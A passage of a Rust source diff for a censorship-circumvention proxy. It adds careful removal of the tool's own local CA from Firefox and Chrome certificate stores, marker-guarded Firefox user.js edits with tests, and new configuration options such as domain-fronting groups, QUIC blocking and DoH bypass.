Any user-authored `security.enterprise_roots.enabled` line +// (with or without our marker above it) means "hands off". +const FX_MARKER: &str = "// mhrv-rs: auto-added, safe to strip with --remove-cert"; +const FX_PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#; + +#[derive(Debug, PartialEq, Eq)] +enum EnterpriseRootsEdit { + AddedBlock(String), + AlreadyOurs, + UserOwned, +} + +/// Append our marker+pref block to `existing` unless (a) it's already +/// there verbatim (idempotent no-op), or (b) the user has their own +/// `enterprise_roots` pref that we didn't write — in which case we +/// leave everything alone. +fn add_enterprise_roots_block(existing: &str) -> EnterpriseRootsEdit { + if contains_our_block(existing) { + return EnterpriseRootsEdit::AlreadyOurs; + } + if existing.contains("security.enterprise_roots.enabled") { + return EnterpriseRootsEdit::UserOwned; + } + let mut out = existing.to_string(); + if !out.is_empty() && !out.ends_with('\n') { + out.push('\n'); + } + out.push_str(FX_MARKER); + out.push('\n'); + out.push_str(FX_PREF); + out.push('\n'); + EnterpriseRootsEdit::AddedBlock(out) +} + +/// Strip our marker+pref block from `existing` if present. If the pref +/// exists without our marker directly above it, the user owns it — we +/// cannot prove otherwise and leave user.js untouched. +/// +/// Consequence for upgrades from pre-marker versions of this app: the +/// legacy bare pref line stays orphaned in user.js after uninstall. +/// That's cosmetic only (Firefox falls back to its built-in root store +/// the moment the CA leaves the OS trust store), and it's the +/// conservative tradeoff — a bare `enterprise_roots = true` line is +/// indistinguishable from a user- or enterprise-policy-authored one, +/// and silently revoking that would break unrelated Firefox trust +/// behavior. README documents the orphan. 
+fn strip_enterprise_roots_block(existing: &str) -> Option<String> {
+    if !contains_our_block(existing) {
+        return None;
+    }
+    let lines: Vec<&str> = existing.lines().collect();
+    let mut out: Vec<&str> = Vec::with_capacity(lines.len());
+    let mut i = 0;
+    while i < lines.len() {
+        let is_marker = lines[i].trim() == FX_MARKER;
+        let next_is_our_pref = lines.get(i + 1).map_or(false, |l| l.trim() == FX_PREF);
+        if is_marker && next_is_our_pref {
+            i += 2;
+            continue;
+        }
+        out.push(lines[i]);
+        i += 1;
+    }
+    let mut joined = out.join("\n");
+    if existing.ends_with('\n') && !joined.is_empty() {
+        joined.push('\n');
+    }
+    Some(joined)
+}
+
+/// True iff `existing` contains our sentinel directly above our pref.
+fn contains_our_block(existing: &str) -> bool {
+    let mut prev: Option<&str> = None;
+    for line in existing.lines() {
+        if prev.map(|p| p.trim()) == Some(FX_MARKER) && line.trim() == FX_PREF {
+            return true;
+        }
+        prev = Some(line);
+    }
+    false
+}
+
+/// True iff `existing` has our exact pref line but NOT inside our
+/// marker+pref block — i.e. an orphan `security.enterprise_roots.enabled
+/// = true` whose provenance we can't prove. Used by
+/// `disable_firefox_enterprise_roots` to surface a one-line hint on
+/// uninstall so users upgrading from pre-v1.2.13 installs know their
+/// Firefox user.js still has a cosmetic orphan pref from the old app
+/// (not broken, just left in place because we can't distinguish it
+/// from a user-authored line).
+fn has_bare_enterprise_roots(existing: &str) -> bool {
+    if contains_our_block(existing) {
+        return false;
+    }
+    existing.lines().any(|l| l.trim() == FX_PREF)
+}
+
 fn has_nss_certutil() -> bool {
+    // We want NSS's `certutil` (from libnss3-tools), not Windows's
+    // built-in `certutil.exe` which shares the binary name but has
+    // completely different semantics. The previous heuristic looked
+    // for "-d" in help output, which false-positived on Windows
+    // because `-dump` / `-dumpPFX` are in the Windows help text.
+ // + // "nickname" is an NSS-specific concept (single-letter batch verbs + // like `-A`/`-D`/`-n nickname`); the Windows and macOS built-in + // certutils don't use that term. Matching on it reliably + // discriminates. Command::new("certutil") .arg("--help") .output() .ok() .map(|o| { - // macOS has a different certutil built-in that doesn't support -d. - // NSS-specific help output mentions the -d / -n flags. - String::from_utf8_lossy(&o.stderr).contains("-d") - || String::from_utf8_lossy(&o.stdout).contains("-d") + let combined = format!( + "{}{}", + String::from_utf8_lossy(&o.stderr), + String::from_utf8_lossy(&o.stdout) + ); + combined.to_ascii_lowercase().contains("nickname") }) .unwrap_or(false) } @@ -516,15 +1108,7 @@ fn install_nss_in_dir(dir_arg: &str, cert_path: &str) -> bool { let res = Command::new("certutil") .args([ - "-A", - "-n", - CERT_NAME, - "-t", - "C,,", - "-d", - dir_arg, - "-i", - cert_path, + "-A", "-n", CERT_NAME, "-t", "C,,", "-d", dir_arg, "-i", cert_path, ]) .output(); match res { @@ -559,6 +1143,226 @@ fn install_nss_in_profile(profile: &Path, cert_path: &str) -> bool { install_nss_in_dir(&dir_arg, cert_path) } +/// Best-effort reverse of `install_nss_stores`: delete our cert from +/// every Firefox profile NSS DB we can find, plus the shared Chrome/ +/// Chromium NSS DB on Linux, and remove the user.js pref we added. +/// +/// NSS cleanup is explicitly best-effort — `certutil` from libnss3-tools +/// may be missing, a DB may be locked by a running Firefox/Chrome, or +/// the delete may fail for reasons we can't distinguish. When that +/// happens we log a manual-cleanup hint but don't fail the whole +/// revocation. Callers of `remove_ca` should convey this to users so +/// the `--remove-cert` promise is "OS trust store + best-effort NSS", +/// not "guaranteed NSS". +/// Outcome of an NSS cleanup pass. `tried` / `ok` let callers render +/// accurate messages like "NSS cleanup partial: 1/3 stores updated". 
+/// `tool_missing_with_stores_present` flags the case where we found +/// Firefox/Chrome NSS DBs but NSS `certutil` isn't on PATH — surfaced +/// so the UI/CLI can tell the user why the cleanup is incomplete. +#[derive(Debug, Clone, Copy, Default)] +pub struct NssReport { + pub tried: usize, + pub ok: usize, + pub tool_missing_with_stores_present: bool, +} + +impl NssReport { + pub fn is_clean(&self) -> bool { + !self.tool_missing_with_stores_present && self.tried == self.ok + } +} + +fn remove_nss_stores() -> NssReport { + disable_firefox_enterprise_roots(); + + if !has_nss_certutil() { + // Only warn if there's actually an NSS store we can see — if the + // user never ran Firefox/Chrome on this machine there's nothing + // to clean up either way. + let profiles = firefox_profile_dirs(); + let chrome_present: bool; + #[cfg(target_os = "linux")] + { + chrome_present = chrome_nssdb_path() + .map(|p| p.join("cert9.db").exists() || p.join("cert8.db").exists()) + .unwrap_or(false); + } + #[cfg(not(target_os = "linux"))] + { + chrome_present = false; + } + let stores_present = !profiles.is_empty() || chrome_present; + if stores_present { + tracing::warn!( + "NSS certutil not found — cannot automatically remove CA from \ + Firefox/Chrome NSS stores. Remove `MasterHttpRelayVPN` manually \ + via each browser's certificate settings, or install NSS tools \ + (`libnss3-tools` on Debian/Ubuntu, `nss-tools` on Fedora/RHEL) \ + and re-run --remove-cert." 
+ ); + } + return NssReport { + tried: 0, + ok: 0, + tool_missing_with_stores_present: stores_present, + }; + } + + let mut report = NssReport::default(); + + for p in firefox_profile_dirs() { + report.tried += 1; + if remove_nss_in_profile(&p) { + report.ok += 1; + } + } + + #[cfg(target_os = "linux")] + { + if let Some(nssdb) = chrome_nssdb_path() { + if nssdb.join("cert9.db").exists() || nssdb.join("cert8.db").exists() { + report.tried += 1; + let dir_arg = format!("sql:{}", nssdb.display()); + if remove_nss_in_dir(&dir_arg) { + report.ok += 1; + tracing::info!( + "Removed CA from Chrome/Chromium NSS DB: {}", + nssdb.display() + ); + } + } + } + } + + if report.tried > 0 { + if report.ok == report.tried { + tracing::info!("Removed CA from {} NSS store(s).", report.ok); + } else { + tracing::warn!( + "NSS cleanup partial: {}/{} stores updated. If Firefox/Chrome \ + was running, close it and re-run --remove-cert. Otherwise \ + remove `MasterHttpRelayVPN` manually via each browser's cert \ + settings.", + report.ok, + report.tried + ); + } + } + report +} + +/// Best-effort remove our cert from one NSS DB. +/// +/// Idempotent contract: "cert was never in this DB" is success. +/// Critical distinction from probe *failure*: if `certutil -L` fails +/// because the DB is locked by a running Firefox/Chrome, corrupt, or +/// inaccessible, we must NOT return `true` — that would silently mask +/// an incomplete revocation the user can't see, and NSS would keep +/// trusting the stale root. We parse stderr: only the specific +/// "could not find cert" message means absent. +fn remove_nss_in_dir(dir_arg: &str) -> bool { + let list = Command::new("certutil") + .args(["-L", "-n", CERT_NAME, "-d", dir_arg]) + .output(); + match list { + Ok(o) if o.status.success() => { + // Cert is present — fall through to delete. 
+ } + Ok(o) => { + let stderr = String::from_utf8_lossy(&o.stderr); + if is_nss_not_found(&stderr) { + tracing::debug!("NSS {}: no `{}` entry — already clean", dir_arg, CERT_NAME); + return true; + } + tracing::warn!( + "NSS {}: probe failed (DB locked / inaccessible / other error): {}", + dir_arg, + stderr.trim() + ); + return false; + } + Err(e) => { + tracing::warn!("NSS {}: probe exec failed: {}", dir_arg, e); + return false; + } + } + + let res = Command::new("certutil") + .args(["-D", "-n", CERT_NAME, "-d", dir_arg]) + .output(); + match res { + Ok(o) if o.status.success() => true, + Ok(o) => { + tracing::warn!( + "NSS {}: delete failed: {}", + dir_arg, + String::from_utf8_lossy(&o.stderr).trim() + ); + false + } + Err(e) => { + tracing::warn!("NSS {}: delete exec failed: {}", dir_arg, e); + false + } + } +} + +/// Classify NSS `certutil` stderr as "nickname not present" (idempotent +/// success signal) vs any other failure mode (DB locked, DB corrupt, +/// permission, etc.). Exposed for unit testing. Matches only the +/// specific not-found messages NSS emits — anything else is treated as +/// a real failure so silent bugs can't hide behind false positives. +fn is_nss_not_found(stderr: &str) -> bool { + let s = stderr.to_ascii_lowercase(); + s.contains("could not find cert") || s.contains("could not find a certificate") +} + +fn remove_nss_in_profile(profile: &Path) -> bool { + let prefix = if profile.join("cert9.db").exists() { + "sql:" + } else if profile.join("cert8.db").exists() { + "" + } else { + return false; + }; + let dir_arg = format!("{}{}", prefix, profile.display()); + remove_nss_in_dir(&dir_arg) +} + +/// Undo `enable_firefox_enterprise_roots`: for each profile, strip the +/// marker+pref block if (and only if) we wrote it. If the user owns +/// their own `enterprise_roots` pref — indicated by the absence of our +/// marker line — leave user.js alone entirely. 
+fn disable_firefox_enterprise_roots() { + for profile in firefox_profile_dirs() { + let user_js = profile.join("user.js"); + let Ok(existing) = std::fs::read_to_string(&user_js) else { + continue; + }; + if let Some(new) = strip_enterprise_roots_block(&existing) { + let _ = std::fs::write(&user_js, new); + continue; + } + // No marker block to strip, but an orphan pref is present. + // Surface it so the user isn't left wondering why user.js + // still has an enterprise_roots line after --remove-cert. + // The orphan is harmless (Firefox falls back to its built-in + // root store once the CA leaves the OS store), but silent + // leftovers feel like half-done removals. + if has_bare_enterprise_roots(&existing) { + tracing::info!( + "Firefox profile {}: `security.enterprise_roots.enabled` pref \ + present without our marker — left in place. If it was written \ + by a pre-v1.2.13 install it's a cosmetic orphan (harmless, \ + Firefox falls back to its built-in root store); remove it \ + manually from user.js if it bothers you. 
If you set it \ + yourself, leave it.", + profile.display() + ); + } + } +} + fn firefox_profile_dirs() -> Vec { use std::path::PathBuf; let mut roots: Vec = Vec::new(); @@ -579,7 +1383,10 @@ fn firefox_profile_dirs() -> Vec { } "windows" => { if let Ok(appdata) = std::env::var("APPDATA") { - roots.push(PathBuf::from(format!("{}\\Mozilla\\Firefox\\Profiles", appdata))); + roots.push(PathBuf::from(format!( + "{}\\Mozilla\\Firefox\\Profiles", + appdata + ))); } } _ => {} @@ -689,4 +1496,308 @@ ID_LIKE=debian let content = "SOMEFIELD=maybearchived\nFOO=bar\n"; assert_eq!(classify_os_release(content), "unknown"); } + + // ── Firefox user.js block install / uninstall ── + + #[test] + fn enterprise_roots_block_added_to_empty_userjs() { + let got = add_enterprise_roots_block(""); + let expected = format!("{}\n{}\n", FX_MARKER, FX_PREF); + assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected)); + } + + #[test] + fn enterprise_roots_block_appended_preserving_existing_prefs() { + let existing = "user_pref(\"some.other\", 1);\n"; + let got = add_enterprise_roots_block(existing); + let expected = format!( + "user_pref(\"some.other\", 1);\n{}\n{}\n", + FX_MARKER, FX_PREF + ); + assert_eq!(got, EnterpriseRootsEdit::AddedBlock(expected)); + } + + #[test] + fn enterprise_roots_block_is_idempotent_when_marker_present() { + let existing = format!( + "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n", + FX_MARKER, FX_PREF + ); + assert_eq!( + add_enterprise_roots_block(&existing), + EnterpriseRootsEdit::AlreadyOurs + ); + } + + #[test] + fn enterprise_roots_block_respects_user_owned_pref_without_marker() { + // User has enterprise_roots set themselves — no marker above it. + // We must NOT write our line, and we must NOT claim ownership on + // uninstall (tested separately below). 
+ let existing = "user_pref(\"security.enterprise_roots.enabled\", true);\n"; + assert_eq!( + add_enterprise_roots_block(existing), + EnterpriseRootsEdit::UserOwned + ); + } + + #[test] + fn enterprise_roots_block_respects_user_owned_pref_set_to_false() { + // User explicitly disabled it — also a user-owned pref, leave alone. + let existing = "user_pref(\"security.enterprise_roots.enabled\", false);\n"; + assert_eq!( + add_enterprise_roots_block(existing), + EnterpriseRootsEdit::UserOwned + ); + } + + #[test] + fn strip_enterprise_roots_removes_our_block_and_preserves_others() { + let before = format!( + "user_pref(\"a\", 1);\n{}\n{}\nuser_pref(\"b\", 2);\n", + FX_MARKER, FX_PREF + ); + let after = strip_enterprise_roots_block(&before).expect("should strip"); + assert_eq!(after, "user_pref(\"a\", 1);\nuser_pref(\"b\", 2);\n"); + } + + #[test] + fn strip_enterprise_roots_refuses_when_pref_is_bare() { + // No marker above — indistinguishable from a user- or + // enterprise-policy-authored line. Must return None so caller + // leaves user.js untouched. Legacy upgrade users get one + // cosmetic orphan line; revoking user-owned Firefox trust + // behavior silently is worse. + let before = "user_pref(\"security.enterprise_roots.enabled\", true);\n"; + assert_eq!(strip_enterprise_roots_block(before), None); + } + + #[test] + fn strip_enterprise_roots_refuses_when_marker_is_elsewhere() { + // Marker present but not directly above the pref — user may + // have copied our marker line as a comment somewhere else. We + // still can't prove ownership of the pref itself, so leave + // alone. 
+ let before = format!( + "{}\nuser_pref(\"unrelated\", 1);\n\ + user_pref(\"security.enterprise_roots.enabled\", true);\n", + FX_MARKER + ); + assert_eq!(strip_enterprise_roots_block(&before), None); + } + + #[test] + fn strip_enterprise_roots_leaves_user_false_pref_alone() { + let before = "user_pref(\"security.enterprise_roots.enabled\", false);\n"; + assert_eq!(strip_enterprise_roots_block(before), None); + } + + #[test] + fn strip_enterprise_roots_returns_none_when_pref_absent() { + let before = "user_pref(\"other\", 1);\nuser_pref(\"another\", 2);\n"; + assert_eq!(strip_enterprise_roots_block(before), None); + } + + #[test] + fn strip_enterprise_roots_roundtrip_from_empty() { + // add_block("") -> strip_block(added) -> "" (no trailing garbage). + let added = match add_enterprise_roots_block("") { + EnterpriseRootsEdit::AddedBlock(s) => s, + other => panic!("unexpected: {:?}", other), + }; + let stripped = strip_enterprise_roots_block(&added).expect("should strip"); + assert_eq!(stripped, ""); + } + + // ── has_bare_enterprise_roots ── + + #[test] + fn bare_enterprise_roots_detected_when_no_marker_present() { + let content = "user_pref(\"security.enterprise_roots.enabled\", true);\n"; + assert!(has_bare_enterprise_roots(content)); + } + + #[test] + fn bare_enterprise_roots_not_detected_when_marker_block_present() { + // Our marker+pref block — strip handles this; has_bare_ must + // return false so we don't double-warn about a line we own. + let content = format!("{}\n{}\n", FX_MARKER, FX_PREF); + assert!(!has_bare_enterprise_roots(&content)); + } + + #[test] + fn bare_enterprise_roots_not_detected_when_pref_absent() { + let content = "user_pref(\"other\", 1);\n"; + assert!(!has_bare_enterprise_roots(content)); + } + + #[test] + fn bare_enterprise_roots_ignores_false_variant() { + // User explicitly set enterprise_roots = false — not our line + // and not the pre-marker legacy write (which only ever wrote + // true). No orphan to warn about. 
+ let content = "user_pref(\"security.enterprise_roots.enabled\", false);\n"; + assert!(!has_bare_enterprise_roots(content)); + } + + // ── should_reconcile_for ── + + #[test] + fn reconcile_skipped_for_normal_user() { + // euid != 0 — even with SUDO_USER set we must NOT re-root HOME. + // A non-root process that happened to inherit SUDO_USER (or + // used `sudo -E`) shouldn't get to redirect cert paths. + assert_eq!(should_reconcile_for(1000, Some("alice")), None); + assert_eq!(should_reconcile_for(1000, None), None); + } + + #[test] + fn reconcile_skipped_for_real_root_login_without_sudo() { + // Load-bearing case the maintainer asked to pin: euid == 0 + // AND no SUDO_USER means the process is a real root login, + // not a sudo elevation. HOME should stay as /root; we must + // not try to resolve some other user's home. + assert_eq!(should_reconcile_for(0, None), None); + } + + #[test] + fn reconcile_skipped_when_sudo_user_is_empty_or_root() { + assert_eq!(should_reconcile_for(0, Some("")), None); + assert_eq!(should_reconcile_for(0, Some("root")), None); + } + + #[test] + fn reconcile_triggers_for_real_sudo_invocation() { + // euid == 0 AND SUDO_USER points to a non-root user — this is + // the sudo case we do want to reconcile. + assert_eq!(should_reconcile_for(0, Some("alice")), Some("alice")); + } + + // ── sudo_parse_passwd_home ── + + #[test] + fn parses_debian_passwd_entry() { + let line = "liyon:x:1000:1000:Liyon,,,:/home/liyon:/bin/bash\n"; + assert_eq!(sudo_parse_passwd_home(line), Some("/home/liyon".into())); + } + + #[test] + fn macos_passwd_format_does_not_parse_and_falls_back_to_convention() { + // macOS `dscl`-sourced passwd lines have extra fields + // (pw_class, chg, exp) before home, so index 5 lands on a + // non-home field. sudo_parse_passwd_home is intentionally + // Linux-shaped — the macOS path relies on the `/Users/` + // convention in `unix::resolve_home` rather than on this + // parser. This test pins that contract. 
+ let line = "liyon:*:501:20::0:0:Liyon Bonakdar:/Users/liyon:/bin/zsh"; + assert_ne!(sudo_parse_passwd_home(line), Some("/Users/liyon".into())); + } + + #[test] + fn rejects_malformed_passwd_line_too_few_fields() { + let line = "liyon:x:1000:1000\n"; + assert_eq!(sudo_parse_passwd_home(line), None); + } + + #[test] + fn rejects_empty_home_field() { + let line = "svcacct:x:999:999:gecos::/bin/false\n"; + assert_eq!(sudo_parse_passwd_home(line), None); + } + + #[test] + fn returns_first_matching_line_when_multiple() { + // getent only prints one line, but guard against future change. + let content = "liyon:x:1000:1000::/home/liyon:/bin/bash\n\ + other:x:1001:1001::/home/other:/bin/bash\n"; + assert_eq!(sudo_parse_passwd_home(content), Some("/home/liyon".into())); + } + + // ── NssReport::is_clean ── + + #[test] + fn nss_report_is_clean_when_nothing_tried() { + let r = NssReport::default(); + assert!(r.is_clean()); + } + + #[test] + fn nss_report_is_clean_when_all_attempts_succeeded() { + let r = NssReport { + tried: 3, + ok: 3, + tool_missing_with_stores_present: false, + }; + assert!(r.is_clean()); + } + + #[test] + fn nss_report_not_clean_on_partial_failure() { + let r = NssReport { + tried: 3, + ok: 2, + tool_missing_with_stores_present: false, + }; + assert!(!r.is_clean()); + } + + #[test] + fn nss_report_not_clean_when_tool_missing_with_stores() { + // Even with tried=0 (we couldn't try anything), the presence + // of NSS stores plus a missing tool means cleanup is NOT + // complete — callers should flag this to the user. + let r = NssReport { + tried: 0, + ok: 0, + tool_missing_with_stores_present: true, + }; + assert!(!r.is_clean()); + } + + // ── is_nss_not_found ── + + #[test] + fn nss_not_found_classifies_standard_not_found_message() { + // Typical NSS certutil output when the nickname is absent. 
+ let stderr = "certutil: Could not find cert: MasterHttpRelayVPN\n"; + assert!(is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_classifies_alt_wording_some_versions_emit() { + let stderr = "certutil: could not find a certificate named 'MasterHttpRelayVPN'\n"; + assert!(is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_locked_database_error() { + // Regression guard for the critical bug: DB locked (Firefox + // running) must NOT be treated as "cert absent" — that would + // silently report clean revocation while NSS keeps trusting + // the stale root. + let stderr = "certutil: function failed: SEC_ERROR_LOCKED_DATABASE: \ + the certificate/key database is locked.\n"; + assert!(!is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_bad_database_error() { + let stderr = "certutil: function failed: SEC_ERROR_BAD_DATABASE: \ + security library: bad database.\n"; + assert!(!is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_permission_error() { + let stderr = "certutil: unable to open \"sql:/home/x/.mozilla/firefox/profile\" \ + (Permission denied)\n"; + assert!(!is_nss_not_found(stderr)); + } + + #[test] + fn nss_not_found_rejects_empty_stderr() { + // An empty stderr with a non-zero exit is ambiguous — safer + // to classify as "not found is NOT proven", i.e. failure. + assert!(!is_nss_not_found("")); + } } diff --git a/src/config.rs b/src/config.rs index 74d08155..e2dd10c3 100644 --- a/src/config.rs +++ b/src/config.rs @@ -1,4 +1,5 @@ -use serde::Deserialize; +use rustls::pki_types::ServerName; +use serde::{Deserialize, Serialize}; use std::collections::HashMap; use std::path::Path; @@ -14,14 +15,19 @@ pub enum ConfigError { /// Operating mode. `AppsScript` is the full client — MITMs TLS locally and /// relays HTTP/HTTPS through a user-deployed Apps Script endpoint. -/// `GoogleOnly` is a bootstrap: no relay, no Apps Script config needed, -/// only the SNI-rewrite tunnel to the Google edge is active. 
Intended for -/// users who need to reach `script.google.com` to deploy `Code.gs` in the -/// first place. +/// `Direct` runs without any Apps Script relay: only the SNI-rewrite tunnel +/// is active, targeting the Google edge by default plus any user-configured +/// `fronting_groups`. Originally introduced as a `script.google.com` +/// bootstrap (when this mode could only reach Google's edge it was named +/// `google_only`), now generalized to any user-configured CDN edge. #[derive(Debug, Clone, Copy, PartialEq, Eq)] pub enum Mode { AppsScript, - GoogleOnly, + /// Was named `GoogleOnly` before v1.9 and the introduction of + /// `fronting_groups`. The string `"google_only"` is still accepted + /// in `mode_kind()` as a deprecated alias so existing configs do + /// not break. + Direct, Full, } @@ -29,7 +35,7 @@ impl Mode { pub fn as_str(self) -> &'static str { match self { Mode::AppsScript => "apps_script", - Mode::GoogleOnly => "google_only", + Mode::Direct => "direct", Mode::Full => "full", } } @@ -96,6 +102,14 @@ pub struct Config { /// script IDs. #[serde(default)] pub parallel_relay: u8, + /// Adaptive batch coalesce: after each op arrives, wait this many ms + /// for more ops before firing the batch. Resets on every arrival. + /// 0 = use compiled default (40ms). + #[serde(default)] + pub coalesce_step_ms: u16, + /// Hard cap on total coalesce wait (ms). 0 = use compiled default (1000ms). + #[serde(default)] + pub coalesce_max_ms: u16, /// Optional explicit SNI rotation pool for outbound TLS to `google_ip`. /// Empty / missing = auto-expand from `front_domain` (current default of /// {www, mail, drive, docs, calendar}.google.com). Set to an explicit list @@ -163,6 +177,197 @@ pub struct Config { /// Issues #39, #127. #[serde(default)] pub passthrough_hosts: Vec, + + /// Block outbound QUIC (UDP/443) at the SOCKS5 listener. + /// + /// QUIC is HTTP/3-over-UDP. 
In `apps_script` mode it's hopeless — + /// Apps Script is HTTP-only, so QUIC datagrams either get refused + /// outright (UDP ASSOCIATE rejected) or silently fall through to + /// `raw-tcp direct` and fail in interesting ways. In `full` mode + /// the tunnel-node CAN carry UDP, but QUIC's congestion control + /// stacked on top of TCP-encapsulated transport produces TCP + /// meltdown for any non-trivial bandwidth — browsers see <1 Mbps + /// where the same site over plain HTTPS would do >50. + /// + /// With `block_quic = true`, the SOCKS5 UDP relay drops any + /// datagram destined for port 443 (silent UDP — caller's stack + /// retries a few times then falls back). Browsers then re-issue + /// the same request as TCP/HTTPS through the regular CONNECT + /// path, which goes through the relay normally. + /// + /// Why this is opt-in rather than always-on: for users on Full + /// mode + udpgw (a recent path; v1.7.0+) the QUIC TCP-meltdown + /// is partially mitigated by udpgw's persistent-socket reuse, + /// and a tiny minority of sites only support HTTP/3 (rare). The + /// flag lets users who care about consistency over peak speed + /// opt out of QUIC at the source rather than discovering its + /// failure modes later. Issue #213. + #[serde(default)] + pub block_quic: bool, + /// When true, suppress the random `_pad` field that v1.8.0+ adds + /// to outbound Apps Script requests for DPI evasion. Default off + /// (padding active). Some users on heavily-throttled ISPs find + /// the +25% bandwidth cost from padding compounds with the + /// throttle to push borderline-working batches into timeouts; + /// turning padding off recovers a bit of headroom at the cost of + /// length-distribution defense against DPI fingerprinting. Issue + /// #391 (EBRAHIM-AM). + /// + /// Don't flip this on speculatively — for users where Apps Script + /// outbound is uncongested, padding is free DPI defense. 
Only
+    /// turn off if you've measured throughput improvement after the
+    /// flip on your specific ISP path.
+    #[serde(default)]
+    pub disable_padding: bool,
+
+    /// Opt-out for the DoH bypass. Default `true` (= DoH stays inside
+    /// the tunnel, bypass off). When the bypass is active
+    /// (`tunnel_doh = false`), CONNECTs to well-known DoH hostnames
+    /// (Cloudflare, Google, Quad9, AdGuard, NextDNS, OpenDNS,
+    /// browser-pinned variants like `chrome.cloudflare-dns.com` and
+    /// `mozilla.cloudflare-dns.com`) skip the Apps Script tunnel and
+    /// exit via plain TCP (or `upstream_socks5` if set). DoH already
+    /// encrypts the queries themselves, so the only privacy property
+    /// the tunnel was adding is hiding *the fact that you're doing
+    /// DoH* from the local network — a marginal gain not worth the
+    /// ~2 s Apps Script round-trip cost paid on every name lookup. In
+    /// Full mode this was the dominant DNS slowdown source.
+    ///
+    /// Set `tunnel_doh: false` to enable the bypass and let DoH go
+    /// direct (saves the ~2 s Apps Script round-trip per name on
+    /// networks where the DoH endpoints are reachable). With the
+    /// bypass off, browsers that find their pinned DoH host
+    /// unreachable already fall back to OS DNS on their own, so
+    /// failure modes are graceful in either direction.
+    ///
+    /// **Default flipped to `true` in v1.9.0** (issue #468). The
+    /// previous default (`false` = bypass active) silently broke for
+    /// Iranian users because Iran ISPs filter direct connections to
+    /// `dns.google`, `chrome.cloudflare-dns.com`, etc. — exactly the
+    /// "pinned DoH" hosts that the bypass was sending through. The
+    /// safe default keeps DoH inside the tunnel; users on networks
+    /// where direct DoH works can opt back into the bypass.
+    ///
+    /// Port-gated to TCP/443 only. A private DoH on a non-standard port
+    /// (e.g. `doh.internal.example:8443`) won't take the bypass path —
+    /// list it in `passthrough_hosts` instead, which has no port gate.
+ #[serde(default = "default_tunnel_doh")] + pub tunnel_doh: bool, + + /// Extra hostnames to treat as DoH endpoints in addition to the + /// built-in default list. Case-insensitive; entries match exactly + /// OR as a dot-anchored suffix unconditionally — `doh.acme.test` + /// covers both `doh.acme.test` and `tenant.doh.acme.test`. (Unlike + /// `passthrough_hosts`, no leading dot is required for suffix + /// matching: every legitimate subdomain of a DoH host is itself + /// a DoH endpoint, so the leading-dot convention would be a + /// footgun.) Use this to cover private/enterprise DoH resolvers + /// without waiting for a release. + /// + /// Inert when `tunnel_doh = true` — the bypass itself is off, so + /// the extras have nothing to feed. The proxy logs a warning at + /// startup if both are set together. + #[serde(default)] + pub bypass_doh_hosts: Vec, + + /// Multi-edge domain-fronting groups. Each group is a triple of + /// (edge IP, front SNI, member domains): when a CONNECT to one of + /// the member domains arrives, the proxy MITMs at the local CA + /// then re-encrypts upstream against `ip` with `sni` as the TLS + /// SNI — same trick we already do for `google_ip` + `front_domain`, + /// but generalised so users can target Vercel's edge (sni=react.dev, + /// fronting vercel.com / vercel.app / nextjs.org / ...) or Fastly's + /// (sni=www.python.org, fronting reddit.com / githubassets.com / ...) + /// directly without burning Apps Script quota or relying on the + /// Google edge for non-Google traffic. + /// + /// The cert returned by the upstream is validated against `sni` by + /// rustls as normal — no custom SAN-allowlist needed, the front SNI + /// must itself be a real domain hosted by the same edge as the + /// targets. Picking the right (ip, sni) pair is on the user; see + /// `docs/fronting-groups.md` for the recipe. 
+ /// + /// Group match wins over the built-in Google SNI-rewrite suffix list + /// but loses to `passthrough_hosts` (explicit user opt-out wins) and + /// to the DoH bypass. Empty / missing = feature off. + #[serde(default)] + pub fronting_groups: Vec, + + /// Auto-blacklist tuning — how many timeouts within the window + /// trip a per-deployment cooldown. + /// + /// Default `3` matches the historical behavior. Single-deployment + /// users who hit transient network blips have reported (#391, #444) + /// that 3 strikes are too few — one cold-start stall plus two + /// network glitches lock out their only relay path. Bumping to + /// `5` or `6` is a reasonable workaround for that case. + /// + /// Multi-deployment users with 10+ healthy alternatives can lower + /// this (e.g. `2`) to fail-fast off a flaky deployment without + /// burning latency on retries. + #[serde(default = "default_auto_blacklist_strikes")] + pub auto_blacklist_strikes: u32, + + /// Window (seconds) for the auto-blacklist strike counter. Strikes + /// older than this are dropped. Default `30`. Larger windows make + /// the heuristic less twitchy at the cost of holding state longer + /// for deployments that have already recovered. + #[serde(default = "default_auto_blacklist_window_secs")] + pub auto_blacklist_window_secs: u64, + + /// Cooldown (seconds) when the strike threshold trips. Default + /// `120`. Single-deployment users who can't afford a 2-min lockout + /// when their only relay misbehaves can drop to `30` or `60`. Multi- + /// deployment users with healthy alternatives can extend to `600` + /// to keep a known-bad deployment out of rotation longer. + #[serde(default = "default_auto_blacklist_cooldown_secs")] + pub auto_blacklist_cooldown_secs: u64, + + /// Per-batch HTTP round-trip timeout (seconds). Default `30` — + /// matches Apps Script's typical response cliff and historical + /// `BATCH_TIMEOUT` constant. 
Slow Iran ISP networks may want `45` + /// or `60` to give Apps Script time to respond past throttle + /// windows. Networks with fail-fast preference may want `15` to + /// retry sooner when a deployment hangs. Floor `5`, ceiling `300` + /// (anything beyond exceeds Apps Script's hard 6-min cap with + /// no benefit). + #[serde(default = "default_request_timeout_secs")] + pub request_timeout_secs: u64, +} + +/// One multi-edge fronting group. Edge CDNs like Vercel and Fastly +/// host hundreds of tenants behind a single set of edge IPs and use +/// the inner HTTP `Host` header (after TLS handshake) to dispatch to +/// the right backend. Pick one neutral domain hosted on the same edge +/// as `sni`; the cert it serves will be valid for that name (rustls +/// validates against `sni`, not against the inner `Host`), and the +/// edge will route based on the `Host` header. +#[derive(Debug, Clone, Deserialize, Serialize)] +pub struct FrontingGroup { + /// Human-readable name used in log lines. Free-form; uniqueness not + /// enforced but recommended. + pub name: String, + /// Edge IP to dial. A single IP for now — most edges have many but + /// one is enough to validate the technique. IP rotation per-group + /// can come later. + pub ip: String, + /// SNI to send on the outbound TLS handshake. Must be a real domain + /// served by the same edge as `domains`, otherwise the edge will + /// either refuse the handshake or serve a default page that 404s + /// the inner Host. Examples: `react.dev` for Vercel, `www.python.org` + /// for Fastly. + pub sni: String, + /// Member domain list. Matching is case-insensitive: an entry + /// matches the host exactly OR as an unconditional dot-anchored + /// suffix (`vercel.com` matches 